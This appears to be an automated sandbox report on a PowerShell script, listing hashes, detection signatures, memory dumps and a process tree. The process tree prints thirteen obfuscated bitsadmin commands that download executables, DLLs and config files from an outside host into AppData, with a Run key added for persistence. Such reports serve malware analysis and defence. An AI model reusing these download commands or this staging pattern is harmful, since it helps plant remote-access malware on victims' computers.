Analysis

  • max time kernel
    122s
  • max time network
    126s
  • platform
    windows7_x64
  • resource
    win7-20231215-en
  • resource tags

    arch:x64, arch:x86, image:win7-20231215-en, locale:en-us, os:windows7-x64, system
  • submitted
    24-01-2024 02:36

General

  • Target
    new 1.ps1
  • Size
    2KB
  • MD5
    164fa80eb15e670539783d577140c0e8
  • SHA1
    316d04c9a545bf48580a58750d8cfe0d7e3f6080
  • SHA256
    be819fd3ceef5b47fd3f1b3a84812db1cef8297e6eb3372e06134d3517e68297
  • SHA512
    73aa708d74e2b6862f61c1344ce6f18576400c5616332669f27e6fa8d255fc4ebee50e3b77dd408d6c772641907dee92dc979e505366b3d5ce952928bfadeb35

Score
6/10

Malware Config

Signatures

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Download via BitsAdmin 1 TTPs 13 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 39 IoCs

Processes

  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\new 1.ps1"
    1⤵
    • Adds Run key to start application
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2368
    • C:\Windows\system32\bitsadmin.exe
      "C:\Windows\system32\bitsadmin.exe" /trAnSFER lyq4XY5i /doWnLOaD /pRioritY NoRmAl https://core-click.net/TVFrontend/mock/HTCTL32.DLL C:\Users\Admin\AppData\Roaming\aragdrts\HTCTL32.DLL
      2⤵
      • Download via BitsAdmin
      PID:2836
    • C:\Windows\system32\bitsadmin.exe
      "C:\Windows\system32\bitsadmin.exe" /trAnSFER lyq4XY5i /doWnLOaD /pRioritY NoRmAl https://core-click.net/TVFrontend/mock/nsm_vpro.ini C:\Users\Admin\AppData\Roaming\aragdrts\nsm_vpro.ini
      2⤵
      • Download via BitsAdmin
      PID:2744
    • C:\Windows\system32\bitsadmin.exe
      "C:\Windows\system32\bitsadmin.exe" /trAnSFER lyq4XY5i /doWnLOaD /pRioritY NoRmAl https://core-click.net/TVFrontend/mock/client32.ini C:\Users\Admin\AppData\Roaming\aragdrts\client32.ini
      2⤵
      • Download via BitsAdmin
      PID:2584
    • C:\Windows\system32\bitsadmin.exe
      "C:\Windows\system32\bitsadmin.exe" /trAnSFER lyq4XY5i /doWnLOaD /pRioritY NoRmAl https://core-click.net/TVFrontend/mock/client32.exe C:\Users\Admin\AppData\Roaming\aragdrts\client32.exe
      2⤵
      • Download via BitsAdmin
      PID:2828
    • C:\Windows\system32\bitsadmin.exe
      "C:\Windows\system32\bitsadmin.exe" /trAnSFER lyq4XY5i /doWnLOaD /pRioritY NoRmAl https://core-click.net/TVFrontend/mock/pcicapi.dll C:\Users\Admin\AppData\Roaming\aragdrts\pcicapi.dll
      2⤵
      • Download via BitsAdmin
      PID:2604
    • C:\Windows\system32\bitsadmin.exe
      "C:\Windows\system32\bitsadmin.exe" /trAnSFER lyq4XY5i /doWnLOaD /pRioritY NoRmAl https://core-click.net/TVFrontend/mock/nskbfltr.inf C:\Users\Admin\AppData\Roaming\aragdrts\nskbfltr.inf
      2⤵
      • Download via BitsAdmin
      PID:2176
    • C:\Windows\system32\bitsadmin.exe
      "C:\Windows\system32\bitsadmin.exe" /trAnSFER lyq4XY5i /doWnLOaD /pRioritY NoRmAl https://core-click.net/TVFrontend/mock/NSM.LIC C:\Users\Admin\AppData\Roaming\aragdrts\NSM.LIC
      2⤵
      • Download via BitsAdmin
      PID:1612
    • C:\Windows\system32\bitsadmin.exe
      "C:\Windows\system32\bitsadmin.exe" /trAnSFER lyq4XY5i /doWnLOaD /pRioritY NoRmAl https://core-click.net/TVFrontend/mock/msvcr100.dll C:\Users\Admin\AppData\Roaming\aragdrts\msvcr100.dll
      2⤵
      • Download via BitsAdmin
      PID:2632
    • C:\Windows\system32\bitsadmin.exe
      "C:\Windows\system32\bitsadmin.exe" /trAnSFER lyq4XY5i /doWnLOaD /pRioritY NoRmAl https://core-click.net/TVFrontend/mock/remcmdstub.exe C:\Users\Admin\AppData\Roaming\aragdrts\remcmdstub.exe
      2⤵
      • Download via BitsAdmin
      PID:764
    • C:\Windows\system32\bitsadmin.exe
      "C:\Windows\system32\bitsadmin.exe" /trAnSFER lyq4XY5i /doWnLOaD /pRioritY NoRmAl https://core-click.net/TVFrontend/mock/PCICL32.DLL C:\Users\Admin\AppData\Roaming\aragdrts\PCICL32.DLL
      2⤵
      • Download via BitsAdmin
      PID:296
    • C:\Windows\system32\bitsadmin.exe
      "C:\Windows\system32\bitsadmin.exe" /trAnSFER lyq4XY5i /doWnLOaD /pRioritY NoRmAl https://core-click.net/TVFrontend/mock/TCCTL32.DLL C:\Users\Admin\AppData\Roaming\aragdrts\TCCTL32.DLL
      2⤵
      • Download via BitsAdmin
      PID:1968
    • C:\Windows\system32\bitsadmin.exe
      "C:\Windows\system32\bitsadmin.exe" /trAnSFER lyq4XY5i /doWnLOaD /pRioritY NoRmAl https://core-click.net/TVFrontend/mock/AudioCapture.dll C:\Users\Admin\AppData\Roaming\aragdrts\AudioCapture.dll
      2⤵
      • Download via BitsAdmin
      PID:1876
    • C:\Windows\system32\bitsadmin.exe
      "C:\Windows\system32\bitsadmin.exe" /trAnSFER lyq4XY5i /doWnLOaD /pRioritY NoRmAl https://core-click.net/TVFrontend/mock/PCICHEK.DLL C:\Users\Admin\AppData\Roaming\aragdrts\PCICHEK.DLL
      2⤵
      • Download via BitsAdmin
      PID:584

Network

MITRE ATT&CK Enterprise v15

Downloads

  • memory/2368-4-0x000000001B3B0000-0x000000001B692000-memory.dmp
    Filesize: 2.9MB
  • memory/2368-5-0x0000000001D70000-0x0000000001D78000-memory.dmp
    Filesize: 32KB
  • memory/2368-6-0x000007FEF5B10000-0x000007FEF64AD000-memory.dmp
    Filesize: 9.6MB
  • memory/2368-7-0x0000000002960000-0x00000000029E0000-memory.dmp
    Filesize: 512KB
  • memory/2368-8-0x000007FEF5B10000-0x000007FEF64AD000-memory.dmp
    Filesize: 9.6MB
  • memory/2368-9-0x0000000002960000-0x00000000029E0000-memory.dmp
    Filesize: 512KB
  • memory/2368-10-0x0000000002960000-0x00000000029E0000-memory.dmp
    Filesize: 512KB
  • memory/2368-11-0x0000000002960000-0x00000000029E0000-memory.dmp
    Filesize: 512KB
  • memory/2368-12-0x0000000002960000-0x00000000029E0000-memory.dmp
    Filesize: 512KB
  • memory/2368-13-0x000007FEF5B10000-0x000007FEF64AD000-memory.dmp
    Filesize: 9.6MB
  • memory/2368-14-0x0000000002960000-0x00000000029E0000-memory.dmp
    Filesize: 512KB
  • memory/2368-15-0x0000000002960000-0x00000000029E0000-memory.dmp
    Filesize: 512KB
  • memory/2368-16-0x0000000002960000-0x00000000029E0000-memory.dmp
    Filesize: 512KB
  • memory/2368-18-0x000007FEF5B10000-0x000007FEF64AD000-memory.dmp
    Filesize: 9.6MB